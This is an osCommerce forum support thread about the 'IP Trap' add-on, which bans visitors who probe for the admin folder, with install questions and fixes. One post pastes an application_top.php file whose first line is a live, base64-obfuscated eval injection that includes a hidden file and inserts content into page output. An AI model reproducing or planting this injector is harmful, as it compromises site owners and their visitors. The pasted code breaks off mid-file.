♥Biancoblu Posted October 24, 2009 Share Posted October 24, 2009 Thanks for trying Leslie. I have now added your IP to the whitelist, can you try again and see if you get redirected to index.php please? Quote ~ Don't mistake my kindness for weakness ~ Link to comment Share on other sites More sharing options...
Guest Posted October 24, 2009 Share Posted October 24, 2009 (edited) Thanks for trying Leslie. I have now added your IP to the whitelist, can you try again and see if you get redirected to index.php please? I got to your site so I am not banned (thank you), then I went to "the" folder and was redirected to the home page. So, for me it worked as expected. PS I tried IE6 and FF. PPS on my site I copied the contents of "the" directory to a new folder called admin. Edited October 24, 2009 by Coopco Biancoblu, FIMBLE and madstarr 3 Quote Link to comment Share on other sites More sharing options...
♥FIMBLE Posted October 24, 2009 Author Share Posted October 24, 2009 @ Les Thats a really, good idea i like it! Nic Quote Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
♥Biancoblu Posted October 24, 2009 Share Posted October 24, 2009 Thanks for testing Leslie, and I agree with Nic, what you did with the folder is an excellent idea. FIMBLE and cruda55 2 Quote ~ Don't mistake my kindness for weakness ~ Link to comment Share on other sites More sharing options...
Mort-lemur Posted October 29, 2009 Share Posted October 29, 2009 Hi, Firstly I think this is a great contribution. One question though - can I use this as another layer of security to prevent anyone not on the whitelist from trying to access my admin files? Am I being too simplistic in thinking I just need to add another line to the disallows in the robots file? Thanks FIMBLE 1 Quote Now running on a fully modded, Mobile Friendly 2.3.4 Store with the Excellent MTS installed - See my profile for the mods installed ..... So much thanks for all the help given along the way by forum members. Link to comment Share on other sites More sharing options...
♥FIMBLE Posted October 29, 2009 Author Share Posted October 29, 2009 Hi, thank you. hmmm interesting question! In theory no as there is already an index.php page in the admin folder, as this is what it relies upon. Now you have me intrigued so i will have a look at it Nic Quote Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
madstarr Posted November 12, 2009 Share Posted November 12, 2009 I got to your site so I am not banned (thank you), then I went to "the" folder and was redirected to the home page. So, for me it worked as expected. PS I tried IE6 and FF. PPS on my site I copied the contents of "the" directory to a new folder called admin. Can you explain better what you mean copied the contents of "the" directory to a new folder called admin. I understand the theory and i like it, just not sure what i need to do differently. Thank you. Quote Link to comment Share on other sites More sharing options...
Guest Posted November 13, 2009 Share Posted November 13, 2009 Can you explain better what you mean copied the contents of "the" directory to a new folder called admin. I understand the theory and i like it, just not sure what i need to do differently. Thank you. I had previously renamed the admin folder to something else like you need to do to help secure your site. At this point, no admin folder. I then copied the contents of the folder that is used by IP trap (I do not want to name it here, if you install the contribution you should be able to work out what it is) to a new folder called admin. So if someone goes fishing for the admin of my site, they will get banned. No honest person would be looking for my admin, so I do not want them on my site. I have some others set up. Their names are other hacking attempt folders as determined by what appears in my 404 error pages. Quote Link to comment Share on other sites More sharing options...
Goaul Posted November 17, 2009 Share Posted November 17, 2009 Will this addon also be for osCommerce 3.x? or atleast some short manual how to add it to work for that version? Quote Link to comment Share on other sites More sharing options...
♥FIMBLE Posted November 17, 2009 Author Share Posted November 17, 2009 Will this addon also be for osCommerce 3.x? or atleast some short manual how to add it to work for that version? Hi It has not been tested on version 3 as yet, so im not sure Nic Quote Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
rafael-cdkeyhouse Posted December 1, 2009 Share Posted December 1, 2009 Hi i have just installed the V4 and i get this error Parse error: syntax error, unexpected $end in /home/*****/public_html/includes/application_top.php on line 523 i have this on line 523 $products = tep_db_fetch_array($products_query); Quote Link to comment Share on other sites More sharing options...
♥FIMBLE Posted December 4, 2009 Author Share Posted December 4, 2009 an unexpected end means usually that a closing curly brace has been omitted. check the code once again for this Nic Quote Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
♥altoid Posted December 9, 2009 Share Posted December 9, 2009 I then copied the contents of the folder that is used by IP trap (I do not want to name it here....... Nic - Leslie: I am finally getting around to installing the update. Regarding Leslie's concept, would appropriately modifying the robots.txt file to work with this strategy be a good idea?? ie. the the disallow approach. Thanks Quote I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can. I remember what it was like when I first started with osC. It can be overwhelming. However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc. There are several good pros here on osCommerce. Look around, you'll figure out who they are. Link to comment Share on other sites More sharing options...
♥FIMBLE Posted December 9, 2009 Author Share Posted December 9, 2009 Nic - Leslie: I am finally getting around to installing the update. Regarding Leslie's concept, would appropriately modifying the robots.txt file to work with this strategy be a good idea?? ie. the the disallow approach. Thanks Hi Yes add the admin folder if this is what you will rename the personal folder to, i have an update out to protect the admin folder (or where ever you have you admin folder) i will release it soon, there are a few who have tested this for me already and it works fine, just a simple change to make it work too. Nic cruda55 1 Quote Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
♥altoid Posted December 9, 2009 Share Posted December 9, 2009 Hi Yes add the admin folder if this is what you will rename the personal folder to, i have an update out to protect the admin folder (or where ever you have you admin folder) i will release it soon, there are a few who have tested this for me already and it works fine, just a simple change to make it work too. Nic Thanks...will do and will watch for the update also. Much appreciated. Quote I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can. I remember what it was like when I first started with osC. It can be overwhelming. However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc. There are several good pros here on osCommerce. Look around, you'll figure out who they are. Link to comment Share on other sites More sharing options...
sky_diver Posted December 14, 2009 Share Posted December 14, 2009 Will this addon also be for osCommerce 3.x? or atleast some short manual how to add it to work for that version? WHy would you want to flood V3 with incomplete downloads? I think we have all seen enough of that with the current Milestones. Quote Link to comment Share on other sites More sharing options...
Lacocinadebabette Posted December 22, 2009 Share Posted December 22, 2009 Hi, I have installed the IP trap and I'm not sure is working properly (www.lacocinadebabette.com/tienda). I've added one ip adress to the ip trapped folder and I still see it around. I've added mine and if it is first, it bans me, but if it is second it doesn't. Have I done something wrong? Thanks in advance. All best, Beatriz Quote Link to comment Share on other sites More sharing options...
♥FIMBLE Posted December 22, 2009 Author Share Posted December 22, 2009 Hi Did you add the code to the application_top.php? Nic Quote Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
♥altoid Posted December 23, 2009 Share Posted December 23, 2009 Hi Yes add the admin folder if this is what you will rename the personal folder to, i have an update out to protect the admin folder (or where ever you have you admin folder) i will release it soon, there are a few who have tested this for me already and it works fine, just a simple change to make it work too. Nic Nic, got a catch today using the trap. I look through my log to see what occurred, it appears the visitor picked my site up in another forum topic dealing with the admin security matter. I put my site link there, probably shouldn't have in hindsight. Since then I enabled a bunch of security measures including the "trap". I am still on the uphill side of learning but in the log I see a lot of action from the blocked IP. It appears he/she looked around a bit, then I see a GET nibble at "admin" folder. It appears the block comes in the next line then. I ran the IP and it didn't come back to a search engine that I am aware of. I am not sure but it looks like he/she went back and tried coming in through that first link again. I don't fully grasp the log data but I think I get the gist of this. So this may have been a hack attempt? Why else interested in Admin? Am I interpreting this correctly? Thanks Quote I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can. I remember what it was like when I first started with osC. It can be overwhelming. However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc. There are several good pros here on osCommerce. Look around, you'll figure out who they are. Link to comment Share on other sites More sharing options...
Guest Posted December 23, 2009 Share Posted December 23, 2009 Hi Fimble, Excellent contribution, thank you. For me the whitelist was not working because the end of line characters can be different on servers. So I fixed it in personal/index.php to remove the added end of line character "\n" to the ip address of the curious visiter and used rtrim to remove the end of line characters from the array elements from file. Now it worked for me. Quote Link to comment Share on other sites More sharing options...
eclyptik Posted December 27, 2009 Share Posted December 27, 2009 Hi community, i have a problem with the intallation of ip trap V4. I have this message after intallation. i d'ont understand. please help me i need to block many bad spider and robots on my new site. i use osc2.2 RC2. and i have no catalog folder but directly in root folder. << Warning: file() [function.file]: Unable to access DOCUMENT_ROOT/../banned/IP_Trapped.txt in /home/eclyptik/www/starboutik/includes/secret.php on line 11 Warning: file(DOCUMENT_ROOT/../banned/IP_Trapped.txt) [function.file]: failed to open stream: No such file or directory in /home/eclyptik/www/starboutik/includes/secret.php on line 11 Warning: Invalid argument supplied for foreach() in /home/eclyptik/www/starboutik/includes/secret.php on line 13 Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers >> thank you in advance Loic Quote Link to comment Share on other sites More sharing options...
♥FIMBLE Posted December 27, 2009 Author Share Posted December 27, 2009 Hi Have you set the permissions for the files as per the instrcutions? Quote Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
dunn Posted December 28, 2009 Share Posted December 28, 2009 Hello Fimble, I am stuck trying to figure out where is line 56 in my application_top.php it scares me everytime i have to install a contribution that my site will be down. But luckily i have developed a fail safe way of downloading the actual php file before making any changes to it. Anyways i was able to fend off early an attack by the /**/eval(base64_decode virus so i have extended lines can you identify which would be the lines proceeding it. <? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9yanJkaXNjby9wdWJsaWNfaHRtbC9iYWNrdXAvcGhwZm9ybXMvY25rLWFkbWluL2lkeC9kaXNwbGF5L3NlY3Rpb25zL2FkdmFuY2VkL3N0eWxlLmNzcy5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS9yanJkaXNjby9wdWJsaWNfaHRtbC9iYWNrdXAvcGhwZm9ybXMvY25rLWFkbWluL2lkeC9kaXNwbGF5L3NlY3Rpb25zL2FkdmFuY2VkL3N0eWxlLmNzcy5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0dXJuICRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29iaCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?> <?php /* $Id: application_top.php 1833 2008-01-30 22:03:30Z hpdl $ osCommerce, Open Source E-Commerce Solutions http://www.oscommerce.com Copyright © 2008 osCommerce Released under the GNU General Public License */ // start the timer for the page parse time log define('PAGE_PARSE_START_TIME', microtime()); // set the level of error reporting error_reporting(E_ALL & ~E_NOTICE); // check support for register_globals if (function_exists('ini_get') && (ini_get('register_globals') == false) && (PHP_VERSION < 4.3) ) { exit('Server Requirement Error: register_globals is disabled in your PHP configuration. This can be enabled in your php.ini configuration file or in the .htaccess file in your catalog directory. Please use PHP 4.3+ if register_globals cannot be enabled on the server.'); } // Set the local configuration parameters - mainly for developers if (file_exists('includes/local/configure.php')) include('includes/local/configure.php'); // include server parameters require('includes/configure.php'); if (strlen(DB_SERVER) < 1) { if (is_dir('install')) { header('Location: install/index.php'); } } // define the project version define('PROJECT_VERSION', 'osCommerce Online Merchant v2.2 RC2a'); // some code to solve compatibility issues require(DIR_WS_FUNCTIONS . 'compatibility.php'); // set the type of request (secure or not) $request_type = (getenv('HTTPS') == 'on') ? 'SSL' : 'NONSSL'; // set php_self in the local scope if (!isset($PHP_SELF)) $PHP_SELF = $HTTP_SERVER_VARS['PHP_SELF']; if ($request_type == 'NONSSL') { define('DIR_WS_CATALOG', DIR_WS_HTTP_CATALOG); } else { define('DIR_WS_CATALOG', DIR_WS_HTTPS_CATALOG); } // include the list of project filenames require(DIR_WS_INCLUDES . 'filenames.php'); // include the list of project database tables require(DIR_WS_INCLUDES . 'database_tables.php'); // customization for the design layout define('BOX_WIDTH', 125); // how wide the boxes should be in pixels (default: 125) // include the database functions require(DIR_WS_FUNCTIONS . 'database.php'); // make a connection to the database... now tep_db_connect() or die('Unable to connect to database server!'); // set the application parameters $configuration_query = tep_db_query('select configuration_key as cfgKey, configuration_value as cfgValue from ' . TABLE_CONFIGURATION); while ($configuration = tep_db_fetch_array($configuration_query)) { define($configuration['cfgKey'], $configuration['cfgValue']); } // if gzip_compression is enabled, start to buffer the output if ( (GZIP_COMPRESSION == 'true') && ($ext_zlib_loaded = extension_loaded('zlib')) && (PHP_VERSION >= '4') ) { if (($ini_zlib_output_compression = (int)ini_get('zlib.output_compression')) < 1) { if (PHP_VERSION >= '4.0.4') { ob_start('ob_gzhandler'); } else { include(DIR_WS_FUNCTIONS . 'gzip_compression.php'); ob_start(); ob_implicit_flush(); } } else { ini_set('zlib.output_compression_level', GZIP_LEVEL); } } // set the HTTP GET parameters manually if search_engine_friendly_urls is enabled if (SEARCH_ENGINE_FRIENDLY_URLS == 'true') { if (strlen(getenv('PATH_INFO')) > 1) { $GET_array = array(); $PHP_SELF = str_replace(getenv('PATH_INFO'), '', $PHP_SELF); $vars = explode('/', substr(getenv('PATH_INFO'), 1)); for ($i=0, $n=sizeof($vars); $i<$n; $i++) { if (strpos($vars[$i], '[]')) { $GET_array[substr($vars[$i], 0, -2)][] = $vars[$i+1]; } else { $HTTP_GET_VARS[$vars[$i]] = $vars[$i+1]; } $i++; } if (sizeof($GET_array) > 0) { while (list($key, $value) = each($GET_array)) { $HTTP_GET_VARS[$key] = $value; } } } } // define general functions used application-wide require(DIR_WS_FUNCTIONS . 'general.php'); require(DIR_WS_FUNCTIONS . 'html_output.php'); // set the cookie domain $cookie_domain = (($request_type == 'NONSSL') ? HTTP_COOKIE_DOMAIN : HTTPS_COOKIE_DOMAIN); $cookie_path = (($request_type == 'NONSSL') ? HTTP_COOKIE_PATH : HTTPS_COOKIE_PATH); // include cache functions if enabled if (USE_CACHE == 'true') include(DIR_WS_FUNCTIONS . 'cache.php'); // include shopping cart class require(DIR_WS_CLASSES . 'shopping_cart.php'); // include navigation history class require(DIR_WS_CLASSES . 'navigation_history.php'); // check if sessions are supported, otherwise use the php3 compatible session class if (!function_exists('session_start')) { define('PHP_SESSION_NAME', 'osCsid'); define('PHP_SESSION_PATH', $cookie_path); define('PHP_SESSION_DOMAIN', $cookie_domain); define('PHP_SESSION_SAVE_PATH', SESSION_WRITE_DIRECTORY); include(DIR_WS_CLASSES . 'sessions.php'); } // define how the session functions will be used require(DIR_WS_FUNCTIONS . 'sessions.php'); // set the session name and save path tep_session_name('osCsid'); tep_session_save_path(SESSION_WRITE_DIRECTORY); // set the session cookie parameters if (function_exists('session_set_cookie_params')) { session_set_cookie_params(0, $cookie_path, $cookie_domain); } elseif (function_exists('ini_set')) { ini_set('session.cookie_lifetime', '0'); ini_set('session.cookie_path', $cookie_path); ini_set('session.cookie_domain', $cookie_domain); } // set the session ID if it exists if (isset($HTTP_POST_VARS[tep_session_name()])) { tep_session_id($HTTP_POST_VARS[tep_session_name()]); } elseif ( ($request_type == 'SSL') && isset($HTTP_GET_VARS[tep_session_name()]) ) { tep_session_id($HTTP_GET_VARS[tep_session_name()]); } // start the session $session_started = false; if (SESSION_FORCE_COOKIE_USE == 'True') { tep_setcookie('cookie_test', 'please_accept_for_session', time()+60*60*24*30, $cookie_path, $cookie_domain); if (isset($HTTP_COOKIE_VARS['cookie_test'])) { tep_session_start(); $session_started = true; } } elseif (SESSION_BLOCK_SPIDERS == 'True') { $user_agent = strtolower(getenv('HTTP_USER_AGENT')); $spider_flag = false; if (tep_not_null($user_agent)) { $spiders = file(DIR_WS_INCLUDES . 'spiders.txt'); for ($i=0, $n=sizeof($spiders); $i<$n; $i++) { if (tep_not_null($spiders[$i])) { if (is_integer(strpos($user_agent, trim($spiders[$i])))) { $spider_flag = true; break; } } } } if ($spider_flag == false) { tep_session_start(); $session_started = true; } } else { tep_session_start(); $session_started = true; } if ( ($session_started == true) && (PHP_VERSION >= 4.3) && function_exists('ini_get') && (ini_get('register_globals') == false) ) { extract($_SESSION, EXTR_OVERWRITE+EXTR_REFS); } // set SID once, even if empty $SID = (defined('SID') ? SID : ''); // verify the ssl_session_id if the feature is enabled if ( ($request_type == 'SSL') && (SESSION_CHECK_SSL_SESSION_ID == 'True') && (ENABLE_SSL == true) && ($session_started == true) ) { $ssl_session_id = getenv('SSL_SESSION_ID'); if (!tep_session_is_registered('SSL_SESSION_ID')) { $SESSION_SSL_ID = $ssl_session_id; tep_session_register('SESSION_SSL_ID'); } if ($SESSION_SSL_ID != $ssl_session_id) { tep_session_destroy(); tep_redirect(tep_href_link(FILENAME_SSL_CHECK)); } } // verify the browser user agent if the feature is enabled if (SESSION_CHECK_USER_AGENT == 'True') { $http_user_agent = getenv('HTTP_USER_AGENT'); if (!tep_session_is_registered('SESSION_USER_AGENT')) { $SESSION_USER_AGENT = $http_user_agent; tep_session_register('SESSION_USER_AGENT'); } if ($SESSION_USER_AGENT != $http_user_agent) { tep_session_destroy(); tep_redirect(tep_href_link(FILENAME_LOGIN)); } } // verify the IP address if the feature is enabled if (SESSION_CHECK_IP_ADDRESS == 'True') { $ip_address = tep_get_ip_address(); if (!tep_session_is_registered('SESSION_IP_ADDRESS')) { $SESSION_IP_ADDRESS = $ip_address; tep_session_register('SESSION_IP_ADDRESS'); } if ($SESSION_IP_ADDRESS != $ip_address) { tep_session_destroy(); tep_redirect(tep_href_link(FILENAME_LOGIN)); } } // only trust a session ID from the URL if refered // from this site if ( isset($HTTP_SERVER_VARS['HTTP_REFERER']) || tep_session_is_registered('first_referred_by') ) { $referrer = parse_url($HTTP_SERVER_VARS['HTTP_REFERER']); if ( ( HTTP_COOKIE_DOMAIN != substr('.' . $referrer['host'], -1 * strlen(HTTP_COOKIE_DOMAIN)) ) && ( HTTPS_COOKIE_DOMAIN != substr('.' . $referrer['host'], -1 * strlen(HTTPS_COOKIE_DOMAIN)) ) && ( $SID == tep_session_name() . '=' . $HTTP_GET_VARS[tep_session_name()] ) ) { if ( function_exists('session_regenerate_id') ) { session_regenerate_id(); $SID = (defined('SID') ? SID : ''); if ( isset($HTTP_GET_VARS[tep_session_name()]) ) unset($HTTP_GET_VARS[tep_session_name()]); $_SESSION = array(); } } if ( isset($HTTP_SERVER_VARS['HTTP_REFERER']) && ! tep_session_is_registered('first_referred_by') ) { tep_session_register('first_referred_by'); $first_referred_by = $HTTP_SERVER_VARS['HTTP_REFERER']; } } // create the shopping cart & fix the cart if necesary if (tep_session_is_registered('cart') && is_object($cart)) { if (PHP_VERSION < 4) { $broken_cart = $cart; $cart = new shoppingCart; $cart->unserialize($broken_cart); } } else { tep_session_register('cart'); $cart = new shoppingCart; } // include currencies class and create an instance require(DIR_WS_CLASSES . 'currencies.php'); $currencies = new currencies(); // include the mail classes require(DIR_WS_CLASSES . 'mime.php'); require(DIR_WS_CLASSES . 'email.php'); // set the language if (!tep_session_is_registered('language') || isset($HTTP_GET_VARS['language'])) { if (!tep_session_is_registered('language')) { tep_session_register('language'); tep_session_register('languages_id'); } include(DIR_WS_CLASSES . 'language.php'); $lng = new language(); if (isset($HTTP_GET_VARS['language']) && tep_not_null($HTTP_GET_VARS['language'])) { $lng->set_language($HTTP_GET_VARS['language']); } else { $lng->get_browser_language(); } $language = $lng->language['directory']; $languages_id = $lng->language['id']; } // include the language translations require(DIR_WS_LANGUAGES . $language . '.php'); // Ultimate SEO URLs v2.1 if ((!defined(SEO_ENABLED)) || (SEO_ENABLED == 'true')) { include_once(DIR_WS_CLASSES . 'seo.class.php'); if ( !is_object($seo_urls) ){ $seo_urls = new SEO_URL($languages_id); } } // currency if (!tep_session_is_registered('currency') || isset($HTTP_GET_VARS['currency']) || ( (USE_DEFAULT_LANGUAGE_CURRENCY == 'true') && (LANGUAGE_CURRENCY != $currency) ) ) { if (!tep_session_is_registered('currency')) tep_session_register('currency'); if (isset($HTTP_GET_VARS['currency']) && $currencies->is_set($HTTP_GET_VARS['currency'])) { $currency = $HTTP_GET_VARS['currency']; } else { $currency = (USE_DEFAULT_LANGUAGE_CURRENCY == 'true') ? LANGUAGE_CURRENCY : DEFAULT_CURRENCY; } } // navigation history if (tep_session_is_registered('navigation') && is_object($navigation)) { if (PHP_VERSION < 4) { $broken_navigation = $navigation; $navigation = new navigationHistory; $navigation->unserialize($broken_navigation); } else { $navigation = new navigationHistory; } } else { tep_session_register('navigation'); $navigation = new navigationHistory; } $navigation->add_current_page(); # /*if (tep_session_is_registered('navigation')) { # if (PHP_VERSION < 4) { # $broken_navigation = $navigation; # $navigation = new navigationHistory; # $navigation->unserialize($broken_navigation); # } # } else { # tep_session_register('navigation'); # $navigation = new navigationHistory; # } # $navigation->add_current_page(); #*/ // Shopping cart actions if (isset($HTTP_GET_VARS['action'])) { // redirect the customer to a friendly cookie-must-be-enabled page if cookies are disabled if ($session_started == false) { tep_redirect(tep_href_link(FILENAME_COOKIE_USAGE)); } if (DISPLAY_CART == 'true') { $goto = FILENAME_SHOPPING_CART; $parameters = array('action', 'cPath', 'products_id', 'pid'); } else { $goto = basename($PHP_SELF); if ($HTTP_GET_VARS['action'] == 'buy_now') { if (isset($HTTP_GET_VARS['product_to_buy_id'])) { $parameters = array('action', 'pid', 'product_to_buy_id'); } else { $parameters = array('action', 'pid', 'products_id'); } } else { $parameters = array('action', 'pid'); } } switch ($HTTP_GET_VARS['action']) { // customer wants to update the product quantity in their shopping cart case 'update_product' : for ($i=0, $n=sizeof($HTTP_POST_VARS['products_id']); $i<$n; $i++) { if (in_array($HTTP_POST_VARS['products_id'][$i], (is_array($HTTP_POST_VARS['cart_delete']) ? $HTTP_POST_VARS['cart_delete'] : array()))) { $cart->remove($HTTP_POST_VARS['products_id'][$i]); } else { if (PHP_VERSION < 4) { // if PHP3, make correction for lack of multidimensional array. reset($HTTP_POST_VARS); while (list($key, $value) = each($HTTP_POST_VARS)) { if (is_array($value)) { while (list($key2, $value2) = each($value)) { if (ereg ("(.*)\]\[(.*)", $key2, $var)) { $id2[$var[1]][$var[2]] = $value2; } } } } $attributes = ($id2[$HTTP_POST_VARS['products_id'][$i]]) ? $id2[$HTTP_POST_VARS['products_id'][$i]] : ''; } else { $attributes = ($HTTP_POST_VARS['id'][$HTTP_POST_VARS['products_id'][$i]]) ? $HTTP_POST_VARS['id'][$HTTP_POST_VARS['products_id'][$i]] : ''; } $cart->add_cart($HTTP_POST_VARS['products_id'][$i], $HTTP_POST_VARS['cart_quantity'][$i], $attributes, false); } } // {{ buySAFE Module $WantsBond = ($HTTP_POST_VARS['WantsBond'] ? $HTTP_POST_VARS['WantsBond'] : $HTTP_SESSION_VARS['WantsBond']); // }} tep_redirect(tep_href_link($goto, tep_get_all_get_params($parameters))); break; // customer adds a product from the products page case 'add_product' : //.........Technokraft Start ShopCart code......// if (isset($HTTP_POST_VARS['products_id']) && is_numeric($HTTP_POST_VARS['products_id'])) { $cart->add_cart($HTTP_POST_VARS['products_id'], $cart->get_quantity(tep_get_uprid($HTTP_POST_VARS['products_id'], $HTTP_POST_VARS['id']))+1, $HTTP_POST_VARS['id']); } //.........End Technokraft ShopCart code......// tep_redirect(tep_href_link($goto, tep_get_all_get_params($parameters))); break; // performed by the 'buy now' button in product listings and review page case 'buy_now' : if (isset($HTTP_GET_VARS['product_to_buy_id'])) { if (tep_has_product_attributes($HTTP_GET_VARS['product_to_buy_id'])) { tep_redirect(tep_href_link(FILENAME_PRODUCT_INFO, 'products_id=' . $HTTP_GET_VARS['product_to_buy_id'])); } else { $cart->add_cart($HTTP_GET_VARS['product_to_buy_id'], $cart->get_quantity($HTTP_GET_VARS['product_to_buy_id'])+1); } } elseif (isset($HTTP_GET_VARS['products_id'])) { if (tep_has_product_attributes($HTTP_GET_VARS['products_id'])) { tep_redirect(tep_href_link(FILENAME_PRODUCT_INFO, 'products_id=' . $HTTP_GET_VARS['products_id'])); } else { $cart->add_cart($HTTP_GET_VARS['products_id'], $cart->get_quantity($HTTP_GET_VARS['products_id'])+1); } } //.........Start Technokraft ShopCart code......// tep_redirect(html_entity_decode(tep_href_link($goto, tep_get_all_get_params($parameters)))); //.........End Technokraft ShopCart code......// break; case 'notify' : if (tep_session_is_registered('customer_id')) { if (isset($HTTP_GET_VARS['products_id'])) { $notify = $HTTP_GET_VARS['products_id']; } elseif (isset($HTTP_GET_VARS['notify'])) { $notify = $HTTP_GET_VARS['notify']; } elseif (isset($HTTP_POST_VARS['notify'])) { $notify = $HTTP_POST_VARS['notify']; } else { tep_redirect(tep_href_link(basename($PHP_SELF), tep_get_all_get_params(array('action', 'notify')))); } if (!is_array($notify)) $notify = array($notify); for ($i=0, $n=sizeof($notify); $i<$n; $i++) { $check_query = tep_db_query("select count(*) as count from " . TABLE_PRODUCTS_NOTIFICATIONS . " where products_id = '" . $notify[$i] . "' and customers_id = '" . $customer_id . "'"); $check = tep_db_fetch_array($check_query); if ($check['count'] < 1) { tep_db_query("insert into " . TABLE_PRODUCTS_NOTIFICATIONS . " (products_id, customers_id, date_added) values ('" . $notify[$i] . "', '" . $customer_id . "', now())"); } } tep_redirect(tep_href_link(basename($PHP_SELF), tep_get_all_get_params(array('action', 'notify')))); } else { $navigation->set_snapshot(); tep_redirect(tep_href_link(FILENAME_LOGIN, '', 'SSL')); } break; case 'notify_remove' : if (tep_session_is_registered('customer_id') && isset($HTTP_GET_VARS['products_id'])) { $check_query = tep_db_query("select count(*) as count from " . TABLE_PRODUCTS_NOTIFICATIONS . " where products_id = '" . $HTTP_GET_VARS['products_id'] . "' and customers_id = '" . $customer_id . "'"); $check = tep_db_fetch_array($check_query); if ($check['count'] > 0) { tep_db_query("delete from " . TABLE_PRODUCTS_NOTIFICATIONS . " where products_id = '" . $HTTP_GET_VARS['products_id'] . "' and customers_id = '" . $customer_id . "'"); } tep_redirect(tep_href_link(basename($PHP_SELF), tep_get_all_get_params(array('action')))); } else { $navigation->set_snapshot(); tep_redirect(tep_href_link(FILENAME_LOGIN, '', 'SSL')); } break; case 'cust_order' : if (tep_session_is_registered('customer_id') && isset($HTTP_GET_VARS['pid'])) { if 